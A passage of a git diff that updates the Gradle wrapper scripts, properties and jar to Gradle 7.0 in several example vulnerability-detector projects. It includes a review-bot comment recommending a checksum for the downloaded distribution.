'\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_calling_command/gradlew.bat b/examples/example_calling_command/gradlew.bat old mode 100755 new mode 100644 index 5093609d5..93e3f59f1 --- a/examples/example_calling_command/gradlew.bat +++ b/examples/example_calling_command/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar and b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_payload_framework_vuln_detector/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/examples/example_payload_framework_vuln_detector/gradlew b/examples/example_payload_framework_vuln_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_payload_framework_vuln_detector/gradlew +++ b/examples/example_payload_framework_vuln_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
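Review bot: No `distributionSha256Sum` is set in the `gradle-wrapper.properties` hunk for `examples/example_payload_framework_vuln_detector`, so the `gradle-7.0-bin.zip` fetched from `distributionUrl` is unpacked and run without an integrity check. The added `validateDistributionUrl=true` appears to cover only the URL, not the archive contents. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle>` directly below `distributionUrl`. The same applies to the identical hunks for `examples/example_vuln_detector` and `google/detectors/credentials/cve20177615`. Because `gradle-wrapper.jar` is replaced as an opaque binary in the same commit, its checksum should also be compared with the value Gradle publishes for that wrapper version, ideally as a wrapper-validation step in CI.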
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/examples/example_payload_framework_vuln_detector/gradlew.bat b/examples/example_payload_framework_vuln_detector/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/examples/example_payload_framework_vuln_detector/gradlew.bat +++ b/examples/example_payload_framework_vuln_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar and b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.jar differ diff --git a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties +++ b/examples/example_vuln_detector/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/examples/example_vuln_detector/gradlew b/examples/example_vuln_detector/gradlew index fbd7c5158..1aa94a426 100755 --- a/examples/example_vuln_detector/gradlew +++ b/examples/example_vuln_detector/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
